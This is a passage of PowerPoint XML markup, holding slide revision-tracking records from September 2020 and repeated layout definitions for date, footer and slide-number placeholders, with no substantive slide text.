            <ac:spMk id="2" creationId="{CF47946A-A158-1941-AEE4-C3A20B82FDA3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:22:34.682" v="1563" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1597659329" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:22:34.682" v="1563" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1597659329" sldId="266"/>
            <ac:spMk id="2" creationId="{57C55685-1929-E641-B553-CD3A5CA5C8E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:22:34.678" v="1562" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1597659329" sldId="266"/>
            <ac:spMk id="3" creationId="{2A1ACA69-11D6-D748-855F-EDA8C04BD192}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:11:01.670" v="2091" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1959659052" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:11:01.670" v="2091" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:spMk id="2" creationId="{BEFC610D-1C9E-014E-8ACB-781EB6270999}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:23:23.782" v="1617" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:spMk id="3" creationId="{59E96EAF-BF7B-C847-A819-1F1E2E6634CA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:23:39.364" v="1623" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:spMk id="4" creationId="{62A6C5FF-C80F-BA41-812A-7F84C6114101}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T12:33:56.693" v="1686" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:spMk id="7" creationId="{B013EFAD-21F1-E24D-A751-CAA74F1FF1B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:50:33.180" v="1762" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:spMk id="10" creationId="{1D4607ED-4CB9-0640-AF05-39A0F8BEC975}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:53:13.329" v="1781" actId="166"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:picMk id="5" creationId="{EEDCF31B-38C0-EF40-8172-3181422F0713}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:53:27.654" v="1784" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:picMk id="6" creationId="{1BDE3BB0-B8E0-0F4E-8FC5-0275585FE6B4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:52:58.314" v="1778" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:picMk id="8" creationId="{2CB138F2-8A6D-314C-B78F-DADF584DF11F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:53:03.540" v="1779" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1959659052" sldId="267"/>
            <ac:picMk id="9" creationId="{7199E37D-8192-3C48-A789-8C38ACE72A6C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:55:18.375" v="1832" actId="1582"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2431201094" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:54:05.743" v="1823" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2431201094" sldId="268"/>
            <ac:spMk id="2" creationId="{89A13A13-D7B9-3D48-B8B2-5EE19CD8080A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:55:18.375" v="1832" actId="1582"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2431201094" sldId="268"/>
            <ac:spMk id="5" creationId="{7DA16BC0-89EB-1F42-918F-892CF5291DB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:54:18.132" v="1826" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2431201094" sldId="268"/>
            <ac:picMk id="3" creationId="{8BEB131F-010C-9E48-BC4C-8F7F322E1E6C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T19:54:23.669" v="1828" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2431201094" sldId="268"/>
            <ac:picMk id="4" creationId="{00E6D0EB-31E1-6F42-8A64-BF8F3EBFA1AB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod setBg">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:14:24.757" v="1895" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2859530256" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:14:01.909" v="1891" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2859530256" sldId="269"/>
            <ac:spMk id="2" creationId="{65DFF2DC-F05B-E34B-B52C-75673C282C31}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:04:06.242" v="1835" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2859530256" sldId="269"/>
            <ac:spMk id="9" creationId="{53F29798-D584-4792-9B62-3F5F5C36D619}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:14:24.757" v="1895" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2859530256" sldId="269"/>
            <ac:picMk id="4" creationId="{7E0DA2FC-26B2-1F43-8804-1C05785DC08A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:22:27.616" v="1956" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2827661998" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:22:27.616" v="1956" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2827661998" sldId="270"/>
            <ac:spMk id="2" creationId="{FD4A4F18-D8B2-2E4A-A112-CB146449D407}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T20:20:15.600" v="1955" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2827661998" sldId="270"/>
            <ac:picMk id="4" creationId="{3D13870B-3D01-7443-AADE-DAC6BC908C98}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:09:28.777" v="2031" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1832551847" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:09:28.777" v="2031" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1832551847" sldId="271"/>
            <ac:spMk id="2" creationId="{06FAA27C-9D67-A746-A460-3D17D13B93D8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:09:11.111" v="2027" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1832551847" sldId="271"/>
            <ac:picMk id="3" creationId="{EA218100-BB5F-3E47-A181-1B372E1B667B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:09:09.814" v="2026" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1832551847" sldId="271"/>
            <ac:picMk id="4" creationId="{6D7C73A3-7E7B-EB45-94D0-22D67E3F2C1D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:11.531" v="2059" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1723438975" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:09:39.434" v="2032"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1723438975" sldId="272"/>
            <ac:spMk id="2" creationId="{F5F3BDB0-C40E-6948-8225-4E6B47DC7CB2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:01.916" v="2056" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1723438975" sldId="272"/>
            <ac:spMk id="4" creationId="{C5F48F2E-B47B-974D-9788-8167D56B9F12}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:11.531" v="2059" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1723438975" sldId="272"/>
            <ac:picMk id="3" creationId="{9A47E911-A1C5-2845-96EC-9715CFBB2C6A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:34.810" v="2071" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1685505291" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:19.384" v="2060"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1685505291" sldId="273"/>
            <ac:spMk id="2" creationId="{5799B27B-583F-2245-8319-25F86C21618A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:34.810" v="2071" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1685505291" sldId="273"/>
            <ac:spMk id="4" creationId="{BF8EA665-78C7-6C4F-9FEE-2FBC199D23A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Tony Sims" userId="07e4b68ab8d0b9a4" providerId="LiveId" clId="{1236FDBA-FEED-2740-8F4A-CEECB7E3E7D1}" dt="2020-09-17T21:10:31.825" v="2070" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1685505291" sldId="273"/>
            <ac:picMk id="3" creationId="{CE1A0AE5-75EF-3444-81D7-CBBD4D6AD7A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A14DA-7FAC-7347-AC23-ACFE54E16B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C00F9F1-0E09-E14C-8C6B-A38EE68C45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1497108-1DE2-1B4B-9E13-4583453F5961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E566904-25EF-E646-9ABF-88DCD63EA1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E5BAC2-1200-D443-B0A4-699B12079F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181891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F2B62-977C-0544-895F-F604CF0C8C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2782AD-7AAA-DF4E-B861-0C27312541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7628EA-143F-F543-9725-AFA2D4FEAB9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F7F4085-1CFE-A640-BF1A-2C3F3AAECC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BE5BF8-0515-0E46-A89D-9D791CB1A8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4057219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6AE9CF-B06D-8344-BB43-3EF8AA4C6B5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EB7AD28-AD9F-AA40-B762-D53B230EBA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843799-C541-C943-A579-63FDFE8D1AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C33FCD5-6B67-AB46-AD4D-EE57B7DAEE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8CCA77-6BDE-DB47-A099-D64A64A26B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694888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41341-01D7-A74C-90C6-4E5ACC63BE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5047C0-C3E4-874A-9661-419F44496D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50374D-0AB9-D944-9887-EC44090487C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BF51BFE-DFF5-0746-A489-56348D6151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04AC07-14AD-3D44-BB00-F4698C54E9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399687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89073-718D-F045-A0DE-3870C16978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15B58B-079A-3144-8D54-8A98911BDE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239D06-5374-B643-A6CF-8ECC4CC46EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3C4159-91CC-474C-948E-C6C9E067F3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295730-15D2-4241-A54D-1E956384CEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2761966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CA115-297E-2A4B-93F5-3C7C6B4904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BF48D7-279F-2B4E-9721-0C31575BE0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1BC9BF-BC7F-7746-8808-1331642A74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A46C72-82EC-9747-A005-22E39D40D342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2056E4C0-D481-A24E-A70E-5F975807C679}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/16/20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E72D267-8F5E-924B-B948-9DB57D0DB1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5DBDB3-56BF-B54A-A375-C26CB1933B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F9FCDB0-EFC0-9F46-B90A-EA993CFFEBAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
